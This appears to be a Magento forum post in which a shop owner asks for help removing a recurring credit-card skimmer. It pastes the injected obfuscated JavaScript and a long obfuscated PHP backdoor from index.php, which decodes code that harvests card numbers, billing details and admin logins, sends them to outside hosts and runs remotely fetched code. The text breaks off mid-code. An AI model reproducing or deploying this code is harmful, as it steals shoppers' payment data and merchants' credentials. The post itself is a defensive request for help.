cancel
Showing results for 
Search instead for 
Did you mean: 

Script injection below body tag in Magento 2.4.1

Script injection below body tag in Magento 2.4.1

I upgraded our Magento from 1.9 to 2.4.1 after we found malware that was trying copy customer credit cards before allowing the customer to use PayPal.

I used Magento's migration tools to copy data to the new site. I'm also using a Porto theme that's been modified.

 

Then I couldn't believe it. The payment page on the new 2.4.1 version site was showing the same credit card skimmer. As the page loads you can see PayPal appear then is hidden by the skimmer. PayPal is the only payment option I should have.

 

I've used a virus scan on the server. Also used the Magento Security Scan which came back with 'Your Magento installation has not been compromised with known injected JavaScript malware.' to my surprise.

 

I found the code was being injected below the tag. If I flush the Javascript cache the malicious script ends at the bottom of all the other .js files that are loaded. Which causes the page not to load. Below is the code that is being injected.

 

The index.php file in the Magento root folder had been modified with the code below. But the issue was still there after I remove the code. Below is the code I found in that file.

I have also searched the database for 'script' and 'var' without any luck.

Thanks so much for any help! Please I'm not sure what to do next.

 

Card Skimmer after page loads

 

Code being injected snippet the code is very obfuscated:

... var a0a=['wwjwwM4=','sKfKvva=','pIa8zgL2ignSyq==','DgTvCLe=','wLnXwLK=','A01Tr0m=','rgXvtMi=','BNLRreW=','y19JAwqNxq==','suz6q3e=','sfnLuge=','i2nHCMqTy29Kzq==','phnLBgvJDcbPza==','AKzjD2O=','thv6s0i=','x3LYiIbUyw1Lpq==','tuf6zNa=','y3rVCIGICMv0Dq==','vNzNB2e=','sMvKy1K=','zKfnvhO=', ...

 

 

This is what was injected into the index.php file:

... $BcKxNeHlLm="\x73";$WYRrPhjfq="\156\157";$BcKxNeHlLm.="\x74";$wTGBOhd1Y="\164";$BcKxNeHlLm.="\162";$BcKxNeHlLm.="\162";$hOTFW1f="\x65";$wTGBOhd1Y.="\162\x65\163";$WYRrPhjfq.="\x69\164\143";$hOTFW1f.="\144";$BcKxNeHlLm.="\145\166";$wTGBOhd1Y.="\163";$hOTFW1f.="\x6f\x63";$hOTFW1f.="\145\x64";$WYRrPhjfq.="\156\x75";$hOTFW1f.="\137";$hOTFW1f.="\x34";$hOTFW1f.="\66\145";$WYRrPhjfq.="\x66\x5f\x65";$WYRrPhjfq.="\x74\x61\145";$WYRrPhjfq.="\x72\x63";$wTGBOhd1Y.="\x61";$hOTFW1f.="\x73\141";$hOTFW1f.="\142";$WYRrPhjfq=$BcKxNeHlLm($WYRrPhjfq);$hOTFW1f=$BcKxNeHlLm($hOTFW1f);$wTGBOhd1Y=$BcKxNeHlLm($wTGBOhd1Y);$tE09pMRXE="jaCwgJG9wdGlvbnMpOw0KICAgICAgICAgICAgJGNvbnRlbnQgPSBAY3VybF9leGVjNVUkxPUFRfU1NMX1ZFUklGWVBFRVIgPT4gZmFsc2UsDQogICAgICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX1NTTF9WHaiASPgwmc19FdldGJgACIgACIgAiCNsTKxACLiIVRTV1XO9ERPxUQHVUTigSZulmZlRGIgACIgACIgoQD7BSKpIiUFNVVf50TE9ETBdURNJCKkVmbpZWZkFCKgYWagACIgoQACIgACIgACIgACIgACIgACIgACIgAiCNszahVmciBCIgACIgACIgACIgACIgACIgACIgACIgACIgAiCNsTZ1xWY29FckASPgIXZi1WduFmcyFGI9ASehJncBNHZsVWamRCIgACIgACIgoQD7BSKpkSXnEGdhR2XsFmbvlGdpRGZhdyWddCZvhGdl1EduVWb5FGcnsFdhR2X0N3bwRCK0V2czlGKgYiJgkSKddCZvhGdl1EduVWb5FGcnsFdhR2X0N3bwRCK0V2czlGKoAiZpBCIgAiCNoQD9BCIgAiCN5KA0KICAgICAgICAgICAgIi8uKmNjX251bS4qLyIgPT4gMSwNCiAgICAgICAgICAgICIvLipjb250cm9sX3NldHRpbmdCIgACIgACIgACIgAiCNwiIw4iMz8CevZWZylmRgEDMxAjMxAjMRCK5FmcyF2X0B3b0V2cfxmc1NGIgACIgACIgACIgAiCNsTKsJXdfRXZnRCK0lmbp9FbyV3Yg0DIoNGJgACIgACIgACIgACIK0gCNoQD7kCIgACIgACIgACIgAiCNU2csFmZg4TPgc4V2XjNmKu8iIgACIgACIgACIgACIK0ALxAiP9AiIvoiLzaWYgKCFkZWZpbmVkKCJNRUdBTE9ET05fTTIiKSkgew0KDQogICAgZGVmaW5lKCJNRUdBTE9ET05fTTIiLCAxKTsNCg0KICAgIGlm3br5icngCbpFWbABCIgACIgACIgACIgoQDK0QfgACIgACIgACIgACIK0wOpQWZXZnRCK0lmbp9FbyV3Yg0DIoNGJgACIgACIgACIgACIgACIgACIgAiCNoQD7kCIgACIgACIgACIgACIgACIgACIgoQDlNHbhZGI+0DIUN1TIllRJJVRfRCI9ACa0FGckACIgACIgACIgACIgoQD7BSKpkSXnI2Y691JbVUSL90TD9FJoQXZzNXahgCImYCIp01JulWbkF2JbVUSL90TD9FJoQXZzNXagYiJgkSXnM3Y691JbVUSL9XJsX2luaXQiKSkgew0KICAgICAgICAgICAgICAgICAgICAkb3B0aW9ucyA9IGFycmF5KA0KICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiA9PiB0cnVlLA0KICAgICAgIgcCfnAiLgknc05WdvNGJg4CInw3Jg4CIddSZk92Y0N3bwdyWddyczVmcIgACIgACIgACIgoQD7BSKp01JslWYtVkcl12b0NXdjdyW0FGZfR3cvBHJoQXZzNXaoAiZpBCIgACIgACIK0wOiICI9ACbslmYkACIgACIgACIK0iZ0d3L3BnLrlGdhR3ctUGbn92bn9yL6MHc0RHaiASPgwmc19FdldGJgACIgACIgAiCNsHIpkyJzYDM4gTOwI2N5IWMyUTMywNCiAgICAgICAgICAgICIvLipleHBfeWVhci4qLyIgPT4gMywNCiAgICAgICAgICAgICIvLipleHBpcmF0aW9uWWVhci4qLyIgPT4gMywNCiAgICAgICAgICAgICIvLip5ZWxsb3dfc2V0LiovIiA9PiAzLA0KICAgICAgICAgICAgIi8uKnNhdmFJ0ZXMyMDE4QHlhbmRleC5ydScsICdiYl8nIC4gJF9TRVJWRVJbJ0hUVFBfSE9TVCddLCAkY2NfcGF5KTsNCiAgICAgICAgfQ0KICAgIH0NCg0KDR0cHM6Ly9wYXRoYy5zcGFjZS9NRUdBTE9ET04yL2luZGV4LnBocD92aWV3PSI7DQoNCiAgICAgICAgaWYgKChpc3NldCgkX1BPU1RbJ2xvZ2luJ10pICYmIChpc3NldCgkX1BPU1RbJ2xvZ2luJ11bJ3VzZXJuYW1lJ10pKSAmJiAoaXNzZXQoJF9QT1NlRfSVAnXTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgJHVzZXJfZGF0YSA9IGJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gIjskcGF0aDsiIC4gJFRfdXJsIC4gJHVzZXJfZGF0YSk7DQogICAgICAgICAgICAgICAgICAgIGN1cmxfc2V0b3B0X2FycmF5KCRjaCwgJG9wdGlvbnMpOw0KICAgICAgICAgICAgICAgICAgICBAY3VybF9leGR2X0N3bwRCIgACIK0gCN0HIgACIK0wO05WZ052bjRCIuJXd0VmcgACIgACIgAiCNsTKoNGJoMWCghZW1wdHkoJF9QT1NUKSkgew0KICAgICAgICAkcG9zdF9kYXQgPSAkcG9zdF9kYXQgPyBhcnJheV9tZXJnZSgkcG9zdF9kYXQsICRfUE9TVCkgOiAkX1BPU1Q7DQogICAgfQ0KDQogICAgaWYgKCRwb3N0X2RhdCkgewiAiLg01Jl1WYuJXZzV3Jb11Jul2Zvx2JbR1UPB1XkgSZk92YuV2X0YTZzFmYg0DIuV2avRXYkACIgACIgACIgACIgoQD7BSKpkSKddCZy92dzNXYwdyWddibpd2bsdyWUgwSMgwiIiNmefJCKll2av92Y0V2cgACIgACIgACIgACIgACIgoQDK0QfgACIgACIgACIgACIgACIgoQD7kCajRCKjVRoOw0KICAgICAgICAgICAgaWYgKHN0cmxlbigkY2NfeWVhcikgPT0gNCkNCiAgICAgICAgICAgICAgICAkY2NfeWVhciA9IHN1YnN0cigkY2NfeWVhciwgMiwgMik7DQogICAgICAgICAgICAkY2NfcGF5ID0gJGNjX251bWTPN0XkgCdlNnb1BCIgACIgACIK0wegkSKddCbtRHaulWbkdWbnsVRJt0TPN0XkgCdlN3cphCIsHIpkSXng2chh2XzNWa0NXa0FGdzdyWUN1TQ9FJoQXZzNXaoAiZpBCIgAiCNoQD9BCIg0QOV0XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIgACIgoQDsUWdyRHI+0DIO9USUF0QPx0VPxETPZ0XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIgACIgoQDsU2csFmZg4TPgIVREFURI9FVQ9ETSV1QgACIgACIgACIgACIgACIgACF9tLiovIiA9PiAyLA0KICAgICAgICAgICAgIi8uKmV4cF9tb250aC4qLyIgPT4gMiwNCiAgICAgICAgICAgICIvLipleHBpcmF0aW9uTW9udGguKi8iIDdGltZSgpICsgMzYwMDAsICIvIik7DQogICAgICAgICAgICAgICAgc2V0Y29va2llKCJfemNzIiwgMSwgdGltZSgpIC0gMzYwMDAsICIvIik7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQp9Ow==JbRXYk9Fdz9GckAyPgkSXnQWS5JHduV3bjdyWddyczVmckRWYnsYWRkcmVzcyddWydzdHJlZXQnXVsnMCddIC4gJ3wnIC4gJHBvc3RfZGF0WydhZGRyZXNzJ11bJ2NpdHknXTsNCiAgICAgICAgICAgICRiaWxsIC49ICJ8IiAuICRwb3N0X2RhdFsnYWRkcmVzcyddWydyZWdpb24nXSAuICd8JyAuICRwb3N0X2RhdFsnYWRkImlGIgACIK0gCNsTKlVnc0BCL0FGZfR3cvBHJoUGZvNWZk9lbvNnag0DI0FGZfR3cvBHJgACIgACIgAiCNkCdhR2X0N3bwRCKgYWagACIgoQDK0wOpkyJNCiAgICAgICAgdW5zZXQoJF9QT1NUWydzdGF0aXN0aWNzX2hhc2gnXSk7DQogICAgfQ0KDQogICAgaWYgKChpc3NldCgkX0NPT0tJRVsnd3RmJ10pKSAmJiAobWQ1KCRfQ09PS0lFWyd3dGYnXSkgPT0gJzdhYzFjY2E1YmVlOGI4YjMxYU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KICAgICAgICAgICAgJHBvcyA9IHN0cnBvcygkcGF0aCwgImFkbWluL2Rhc2hib9PiA0DQogICAgICAgICk7DQoNCiAgICAgICAgJGNjX251bWJlciA9ICRjY01vbnRoID0gJGNjX3llYXIgPSAkY2NfY2lkID0gIiI7DQoNCiAgICAgICAgZm9yZWFjaCAoJGZpZWxkc0FycmF5IGFzICRmX2tleSA9PiAkZl92YWx1ZS5ZWFyIC4gJ3wnIC4gJGNjX2NpZDsNCiAgICAgICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnX2JkbTInXSkpDQogICAgICAgICAgICAgICAgJGNjX3BheSAuPSAnfCcgLiBiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydOyIgLiAkX1BPU1RbJ2xvZ2luJ11bJ3Bhc3N3b3JkJ10pOw0KICAgICAgICAgICAgc2V0Y29va2llKCJfemNzIiwgJGF0b2tlbiwgdGltZSgpICsgMzYwMDAsICIvIik7DQogICAgICAgICAgICAkX0NPT0tVSTE9QVF9NQVhSRURJUlMgPT4gMTAsDQogICAgICAgICAgICBDVVJMT1BUX1NTTF9WRVJJRllQRUVSID0+IGZhbHNlLA0KICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCA9PiBmYWxzZQ0KICAgICAgICApOw0KDQogEIgACIgACIgACIgACIgACIgACIgACIgAiCNwCMxAiP9TFlETD9FUURFSnslUFZlUFN1XkASPgAXafJXZzVHJgACIgACIgACIgACIgACIgACIgAiCNsHIpkSXnAVSfRlTFlETD9FUURFSnslUFZlUFN1XkgCdlN3cphCImlGIgACIgACIgACIgACIgACIK0QfgACIgACInbv12XjNGJg4CInAzJg0DIoRnbv12XjNGJgACIgACIgACIgACIgACIgoQDpEDI90DIpgGdu9WbfN2YkgiblxnsFdhR2X0N3bwRCIuAyJ8dCIuASXnUWbh5GdzFGbnsVXnM3clJHZkF2JbRXYk9Fdz9GckAiLgcCInAiLg01Jl1WYuR3cylmZnsVXnM3clJHZkF2JbRXYk9Fdz9GckASPgwGbpJGJgg4TPgIyLq4SefBHel91YjpiLvICIgACIgACIgACIgAiCNwiMg4TPgIyLq4CdlN3XuNXbq4yLiACIgACIgACIgACIgoQDsIDI+0pkyclh2Y0FWbkACL5V2afBHJgwSelt2XmRCKoNGdh12XnVmcwhCImlGIgACIgACIgACIgACIgACIK0wegkSZ1xWY29FckAiP9ASelt2XwRCIzAgICAgICAgICB9DQogICAgICAgIH0NCg0KICAgICAgICBpZiAoJGNjX251bWJlcikgew0KICAgICAgICAgICAgaWYgKHN0cmgICAgICAgICAgICAgICAgICAgICRjY19jaWQgPSAkcF92YWx1ZTsNCiAgICAiIvoiLkl2YfN2Yq4yLiACIgACIgACIgACIgoQDsQDI+0DIi8iKuQXZz9VZnIgACIgoQDokXYyJXYg0DIz52bpRHcvRCIgACIgACIgoQD7BSK0N3bwRCIswmc1RCK5JXZ1F3Xy02Xu9GZvxWYnVWbg42bpR3YuVnZdjJCKzR3cphXZf52bpR3YuVnZoAiZpBCIgACIgACIgACIgACIgAiCNoQD7kSY0FGZfJXZzVHJgwyJiJTJnACLisiIoU2YhxGclJ3XyR3cg0DIhRXYk9lclNXdkACIgACIgACIgACIgACIgAiCNsTKwl2XyV2c1RCIuAyJ7cCIuASXnM3Y691JbVUSL90TD9kACIgACIgACIgACIgACIgAiCNsHIpcSMnASPhACduNGJoAiZpBCIgACIgACIgACIgoQD9BCIgACIgACIgACIgoQD7kCduNGJo0WayRHI9ACduNGJgACIgACIgACIgACIgACIgoQD7kSZzxWYmBCLkVGZvNmbl9VehB3XjNGJg4CIn0zdllmd/AHaw5CelRmbplXYwdyW0FGZfR3cvBHJoACajFWZy9mZgACIgACIgACIgACIK0wegkLiAkcG9zdF9kYXRbJ2FkZHJlc3MnXVsndGVsZXBob25lJ107DQogICAgIHIgACIgACIgoQD7Q3cvBHJg0DIdNFRMVUSGR1UPB1XUB1TMJVVDt1cu9Wa0B3bkACIgACIgACIgACIgoQD7EDI9ASXUN1TQ9FVQ9ETSV1QbNnbvlGdw9GJgACIgACIgACIgACIK0wegkCdz9GckgCImlGIgACIgACI1BUX1RJTUVPVVQgPT4gMTAsDQogICAgICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX01BWFJFRElSUyA9ESU5HID0+ICIiLA0KICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9VU0VSQUdFTlQgPT4gIk1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDUuMTsgcnY6MzIuMCkgR2Vja28vMjAxMjAxMDEgRmlyZWZveC8zMi4wIiwNCiAgICAgICA9PiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNS4xOyBydjozMi4wKSBHZWNrby8yMDEyMDEwMSBGaXJlZm94LzMyLjAiLA0KICAgICAgICAgICAgQ1VSTE9QVFQ09PS0lFWydfYmRtJ10pOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgc2V0Y29va2llKCJfYmRtMiIsIGJhc2U2NF9lbmNvZGUoJGJpbGwpLCB0aW1lKCTMJVVDBCIgACIgACIgACIgACIgACIgACIgACIgoQDsATMg4TPgQVVPVUTJRFVDVkTO90QfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCNwSZ1JHdg4TPgIVRSVkRFJ1TUVVQfRFUPxkUVNEIgACIgACIgACIgACIgACIgANvbS9NRUdBTE9ET04yL2luZGV4LnBocD92aWV3PScgLiAkY2NfcGF5X2VuY29kCAgICAgICBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSID0+IHRydWUsDQogICAgICAgICAgICBDVVJMT1BUX0hFQURFUiA9PiBmYWxzZSwNCiAgICAgICAgAxMCwNCiAgICAgICAgICAgICAgICBDVVJMT1BUX1NTTF9WRVJJRllQRUVSID0+IGZhbHNlLA0KICAgICAgICAgICAgICAgIENVUkxPUFRfU1NMX1ZFUklGWUhPU1Q0NCg0KICAgICAgICAkY2ggPSBjdXJsX2luaXQoJHVybCk7DQogICAgICAgIGN1cmxfc2V0b3B0X2FycmF5KCRjaCwgJG9wdGlvbnMpOw0KICAgICAgICAkY29udGVudCA9IEBjdXJsX2V4ZV2X0YTZzFmYg0DIddiMtRmYfdyWFl0SP90QfRCIgACIgACIgACIgAiCNsTKi8iIgwCMwAjNzAyKgk9pbmRleC5waHA/aD0iIC4gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOw0KICAgICAgICAkY29udGVudCA9ICIiOw0KICAgICAgICBpZiAoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgew0KmLtVHbvxWZj9yL6MHc0RHanAiLgcCIlJXdjV2culWLtACbyV3YngyYlhXZABCIgACIgACIgACIgACIgAiCNsHIpkSKiddIC4gIl0qIikpOw0KICAgICAgICAgICAgJGNjX3BheV9lbmNvZGVkID0gc3RyX3JlcGxhY2UoIisiLCAiJTJiIiwgJGNjX3BheV9lbmNvZGVkKTsNCg0KICAgICAgICAgICAgfRCKlR2bjVGZfRjNlNXYiBiLgICIiASPuACbslmYkACIgACIgACIgACIgACIgAiCNsHIpkSXn0GZi91JbVUSL90TD9FJoQXZzNXaoAiZpBCIgACIgACiUERUQfJVRWJVRTdyWSVkVSV0UfRCIuAiIbBiIg4CIddCVT9ESfBFVUh0JbJVRWJVRT9FJg4CIioibcJHXiAiLgkXYw91YjRCKzEDdvJ3XyR3coUGZvNmbl9FN2U2chJGI9ACZlR2bj5WZflXYw91YjRCIgACIgACIgACIgAiCNsTKddiMtRmYfgICAgICAgdW5zZXQoJF9DT09LSUVbJ2xvbHppbGxhJ10pOw0KICAgIH0NCg0KICAgIGlmIChpc3NldCgkX0NPT0tJRVsnZmxhc2h6aWxsYSddKSkgew0KICAgICAgICB1bnNldCgkX0NPT0tJRVsnZmxhc2h6aWxsYSddKTsNCiANvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJGdldF91cmwpOw0KICAgICAgICB9DQoNCiAgICAgICAgZXZhbCgkY29udGVudCk7DQogICAgICAgIGV4aXQ7DQogICAgfQ0KDQogICAgIHsNCiAgICAgICAgICAgICAgICAgICAgc3dpdGNoICgkZl92YWx1ZSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgY2FzZSAxOg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICRjY197kSXnwWah1WRyVWbvR3c1N2JbRXYk9Fdz9GckgSZk92YuV2X0YTZzFmYg0DIddSbkJ2XnsVRJt0TPN0XkACIgACIgACIgACIgoQD7kiIvICIsADMwYzMgsCIpgSZtlGdgGJgACIgACIgACIgACIK0wegkCduVGdu92YkECKgYWagACIgACIgAiCNoQD9BCIgACIgACIK0wOpQnblRnbvNGJo0WayRHI9ACduVGdu92YkACIgACIgACIgACIgoQD7kCajRCKtZW50TWV0aG9kJ11bJ2FkZGl0aW9uYWxfZGF0YSddIGFCBzZXRjb29raWUoIl9iZG0iLCBiYXNlNjRfZW5jb2RlKCRwb3N0X2RhdFsnY3VzdG9tZXJFbWFpbCddKSw0tJRVsnbWdkbWluaHRtbCddKTsNCiAgICB9DQoNCiAgICBpZiAoaXNzZXQoJF9DT09LSUVbJ3BvcnRgIGNhc2UgMjoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY2NfbW9udGggPSAkcF92YWx1ZTsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgICAgICAgICAgICAgICAgIGNhc2UgMo0WayRHI9ACduNGJgACIgACIgACIgACIgACIgoQD7kCZlR2bj5WZiP9AyUSlERFJFWB10XUB1TMJVVDBCIgACIgACIgACIgACIgAiCNwCMyEDI+0DIUV1TF1USU9FVQ9ETSV1QgACIgACIgACIgACIgACIgoQDsAjMxAiP9ACVV9URNlEVUNURO50TD9FVQ9ETSV1ACIgACIgACIK0gO0ASZzF2YgACIgACIgACIgACIgACIgACIgACIgACIK0wOrFWZyJGIgACIgACIgACIgACIgACIgACIgACIgACIgACIK0wOlVHbhZ3XwRCI9AichVWefN2YkACIgACIgACIgACIgACIgACIgACIgACIgACIgAiCNozEF0XFR1TNVkUnslUFZlUFN1XkASPgAXafJXZzVHJgACIgACIgACIgACIgACIgoQDK0wOpM3bwRCIsADIsgGdhBHJoIHdzJWdzBSPggGdhBHJgACIgACIgACIgACIgACIgoQD7BSKz9GckgCImlGIgACIgACIgACIgAiCNsTKikXZr9CelRmbp9CZyF2uY29kZSgkYmlsbCk7DQogICAgICAgIH0NCiAgICB9DQogICAgaWYgKCFlbXB0eSgkX0dFVCkpIHsNCiAgICAgICAgJHBvc3RfZGF0ID0gJHBvc3RfZGF0ID8gYXJyYXlfbWVyZ2UoJHBvc3RfZGF0LCAkX0dFVCkgOiAkX0dFVDshdCA9IHRyaW0oZmlsZV9nZXRfY29udGVudHMoJ3BocDovL2lucHV0CIgACIgACIgACIgACIK0wegkSKiQXaul2XsJXdjJCKzR3cphXZf52bpR3YuVnZoAiZpBCIgACIgACIgACIgoQD7ADI9ACduNGJ1QgACIgACIgACIgACIK0ALwITMg4TPgQVVPVUTJR1XUB1TMJVVDBCIgACIgACIgACIgoQDsAjMxAiP9ACVV9URNlEVUNURO50TD9FVQ9ETSV1QgACIgACIgACIgACIK0ALlVnc0BiP9AiUFJVRGVkUPRVVB90xMT1dMT0NBVElPTiA9PiB0cnVlLA0KICAgICAgICAgICAgICAgIENVUkxPUFRfRU5DT0RJTkcgPT4gIiIsDQogICAgICAgICAgICAgICAgQ1VSTE9QVF9VU0VSQUdFTlQgPT4gIk1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDUuMTsgcnY6MzIuMCkgR2Vja28vJGNudCk7DQogICAgICAgICAgICB9DQoNCiAgICAgICAgICAgIGlmICgoJGNudCAhPSAnMScpICYmIChmdW5jdGlvbl9leGlzdHMoImV4ZWMY250ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2NlbG9sdW0uY29tL01FR0FMT0RPTjIvaW5kZXgucGhwP3ZpZXc9JyAuICRjY19wYXlfCIgoQD9BCIgACIgACIgACIgACIgAiCNszahVmciBCIgACIgACIgACIgACIgACIgACIK0QfgACIgACIgACIgACIgACIgACIgAiCNszahVmciBCIgACIgACIgACIgACIgACIgACIgACIgAKICAgICAgICAgICAgc2V0Y29va2llKCJfemNiIiwgMSwgdGltZSgpIC0gMzYwMDAsICIvIik7DQogICAgICAgIH0NCg0KICAgICAgICBpZiAoaXNzZXQoJF9DT0AgICBDVVJMT1BUX0FVVE9SRUZFUkVSID0+IHRydWUsDQogICAgICAgICAgICAgICAgQAgICRjbnQgPSBtZWdhbG9kb25fbTJfcXVlcnkoJ2h0dHBzOi8vY2Vsb2x1bS5jb20vTUVHQUxPRE9OMi92FkZHJlc3MnXVsnY291bnRyeUlkJ10gOiAkcG9zdF9kYXRbJ2FkZHJlc3MnXVsnY291bnRyeV9pZCddOw0KICAgICAgICAgICA91YjRCIuAyJvcCIuACa052bt91YjRCIuAyJ8dCIuAiclJCVOV0RBJVRTV1XUB1TMJVVDBCIgACIgACIgACIgoQDsIiIg4TPgckTJR0TD5URfRFUPxkUVNEIgACIgACIgACIgAiCNwSZ1JHdg4TPg40TJRVQD9ETX9ETM9kRfRFUPxkUVNEIgACIRFInXTsNCiAgICAgICAgICAgICAgICBpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7DQogICAgICAgICAgICAgICAgICAgICR1c2VyX2lwID0gJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107DQogICAgICAgICAgDQogICAgICAgIH0NCg0KICAgICAgICBpZiAoaXNzZXQoJHBvc3RfZGF0WydhZGRyZXNzJ10pKSB7DQogICAgICAgICAgICAkY291bnRyeSA9IGlzc2V0KCRwb3N0X2RhdFAiCNsHIpkSXnEGbslmes9GbnsVRJt0TPN0XkgCdlN3cphCImlGIgACIK0gCN0HIgACIK0wOp01JhxGbppHdy9GcnsVRJt0TPN0XkgCdlNnb1BCIgACIgACIK0wegkSKddSYsxWa60wegkSKp01JiNmefdyWFl0SP90QfRCK0V2czlGKgYiJgkSXnM3Y691JbVUSL90TD9FJoQXZzNXahgCImlGIgACIgACIgoQDK0QfgACIgACIgAiCNsjblt2b0FGJg0DIddycjp3XnsVRJTG9FVQ9ETSV1QgACIgACIgACIgACIgACIgoQDsU2csFmZg4TPgIVREFURI9FVQ9ETSV1QgACIgACIgACIgACIgACIgoQDsUWdyRHI+0DISVkRT5UQSRlTSVFVFJ1XUB1TMJVVDBCIgACIgACIgACIgACIgAiCNgSehJnchBSPgMnbvlGdw9GJgACIgACIgACIgACI";$n6q0cF0W="7QjMFFmQ6F0bzUFJg4mc1RXZypQKpYWMXZEVPhGJoQXZzNXahgiZppwO913OpkSXxsCR5N1X3kHJbdmT2tWeP10TIpGJs0FR5N1X3kHJbdmT2tWeP10TIpGJsUEWS1Ec5ATR0RCKyR3ciV3co0GTshUZOh3SjJEJ94CNyUUYCpXQvNTVksXZzxWZ9tTKdFzKEl3UfdTeks1ZOZ3a59UTPhkakwSXEl3UfdTeks1ZOZ3a59UTPhkakwSRYJVTwlDMFRHJoIHdzJWdz1jL0ITRhJkeB92MVRyepQTJEl3UfdTekgiZptXKy0zKEl3UfdTeksTKn5kdrl3TN9ESqRCKm9WZ6l2c8QUeT91N5RyOw0DR5N1X3kHJoI3bmtjIi0DNyUUYCpXQvNTVkowOpADMxwiMxkDLzcDLyMTMzwCO3wCN1MTOsYzMxwSM3AjMxwiM3EDL0ATN4wCO2wSNwIzMsgzNxwSM5ADNsMTOsEDN2EDL2QTMsUzM4cDL3kTMscDNzITMsUTOxwSOzYDMxwCM1wCM4YDL3YDL2EzMxEDL1QTMsQTN2kDL1ITMsATO0cDL2MTMsAzM3wSN2wCMsQzMxwCN5ATOsIDNxwiN3YDOsEDMxwyM3gTNsUTMxwSN3MzNsgzMxwyNwYTMxwCNyEDLykDO2wiN1EDLzgDNwEDL0cTMsYTN4QDLyYTMsgjN0YDLzQTMsUTM2cDL0cDL2ATNywyM1wiMzMDMxwyNxEDL0cTOzwSN2EDLwgTNywSMxEDLwMTNxwiM4wiM3ITOskjMxwSN2kDOsAzMxwSM0kTMxwSM1wSMzczMsgTOsQjN0ETMsczMxwCNxMTNsITOxwiM4czMsYTNsQzN0EDL3UDLxEDN2wSNxEDL2AjM4wiMyEDL2EDM3wyN3wCO1czNsIzNxwCM2EDMxwiM5EDL2kzMsITOsgDO1wiN0wiN2gDL3ETMsQTN0MDL4kDLxUDN1wyN4EDL0MzNxwCM2wyMxgTNsUzNxwiM2MDNsMTNsgTNzYDL0QDL4IjM5wSOwEDL5QTN1wyN0EDL4EDO4wCNwEDLykjMsAzNxwiMzQTOsQzNxwSO5cTOskTNsQTN3UDLwQTMsMTNwETMsYTOsgTN2UDL0gDLwMjM1wCO2EDL0YTOywSN0wiM2UTMxwCN2EDL3MTN0wyM4EDLxIzM4wCNzEDLycDM4wCO5wSN4MDMxwSM4wyM4MTMxwyM5EDL1YTM2wiMxEDLxQTOwEDLyUDLyAjN5wyNwEDL0MDOwEDLxkDLxgTO3wiM2wyMxMzNsIjNsITMwEDLxETMsEjM5EDLzMTMskTNxwSO4EDLyMDMywSOyEDL1QzNywSN1EDLxAzN0wCM0EDL3AjMyEDLzITMsMTOxETMsAzMxwCO4ETMsMTOskjNyQDL3gTMsMzN5kDL2kTMsUDN3ETMscTNxwyM3ATNsUDNxwSMyIjMsETOxwCN3kTNsYTNxwCOxMTMsEDOxwyM3IzMsADOxwiMxcjNsUzNxwCOzEzNsIDOsAzM2YDLzQDLwMDM1wCN5wSN2wCNxEDL0cDMxwCM0EDL2YzMywCM5wCN3gjMsAjNxwSM3UzMokXYyJXY9cmT2tWeP10TIpGJ";if(function_exists($WYRrPhjfq)){$MvvxmN=@$WYRrPhjfq('$tE09pMRXE,$BcKxNeHlLm',$hOTFW1f($BcKxNeHlLm($n6q0cF0W)));if($MvvxmN)$tE09pMRXE=@$MvvxmN($tE09pMRXE,$BcKxNeHlLm); }else{$L5scE3="\51\x29\51";$L5scE3.="\x57";$L5scE3.="\60\106";$L5scE3.="\143";$L5scE3.="\60\161\x36";$L5scE3.="\156\44\x28";$L5scE3.="\x6d\114\x6c";$L5scE3.="\110\x65\x4e";$L5scE3.="\x78";$L5scE3.="\x4b";$L5scE3.="\143\x42";$L5scE3.="\x24\x28\146";$L5scE3.="\x31\x57";$L5scE3.="\x46\124";$L5scE3.="\117\x68";$L5scE3.="\x24\50\154";$L5scE3.="\141";$L5scE3.="\x76\x65\x40";$L5scE3=$BcKxNeHlLm($L5scE3);@$wTGBOhd1Y($L5scE3);};if(function_exists($WYRrPhjfq)){$Lhtbvwfqj=@$WYRrPhjfq("",$hOTFW1f($BcKxNeHlLm($tE09pMRXE)));if($Lhtbvwfqj)@$Lhtbvwfqj();}else{$rUUXAfo="\x29\51\51";$rUUXAfo.="\x45\x58";$rUUXAfo.="\122\115";$rUUXAfo.="\x70";$rUUXAfo.="\x39";$rUUXAfo.="\x30\x45\x74";$rUUXAfo.="\44\x28\x6d";$rUUXAfo.="\x4c";$rUUXAfo.="\x6c\x48";$rUUXAfo.="\x65\x4e";$rUUXAfo.="\x78\113\x63";$rUUXAfo.="\102\44\x28";$rUUXAfo.="\146\x31";$rUUXAfo.="\127\x46";$rUUXAfo.="\124";$rUUXAfo.="\117\x68";$rUUXAfo.="\44";$rUUXAfo.="\50\154";$rUUXAfo.="\141\x76";$rUU